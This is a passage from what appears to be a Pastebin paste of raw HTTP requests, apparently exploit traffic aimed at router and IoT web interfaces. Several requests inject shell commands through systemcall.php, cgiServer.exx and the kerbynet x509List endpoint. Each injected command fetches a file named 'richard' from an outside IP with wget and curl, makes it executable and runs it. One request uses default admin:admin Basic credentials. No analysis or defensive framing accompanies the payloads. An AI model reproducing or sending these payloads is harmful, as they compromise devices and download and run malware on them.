  363. Accept: application/json, text/javascript, */*; q=0.01
  364. Accept-Language: en-US,en;q=0.5
  365. Accept-Encoding: gzip, deflate
  366. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  367. X-Requested-With: XMLHttpRequest
  368. Referer: http://10.0.0.1/network_diagnostic_tools.php
  369. Content-Length: 91
  370. Cookie: PHPSESSID=; auth=
  371. DNT: 1
  372. X-Forwarded-For: 8.8.8.8
  373. Connection: keep-alive
  374.  
  375. GET /pages/systemcall.php?command=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  376.  
  377. POST /cgi-bin/cgiServer.exx?system(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard) HTTP/1.0
  378. Host: 10.0.75.122:80
  379. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  380. Accept-Language: en-US,en;q=0.5
  381. Accept-Encoding: gzip, deflate
  382. Authorization: Basic YWRtaW46YWRtaW4=
  383. Connection: keep-alive
  384. Content-Type: application/x-www-form-urlencoded
  385. Content-Length: 0
  386.  
  387. GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%22 HTTP/1.0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!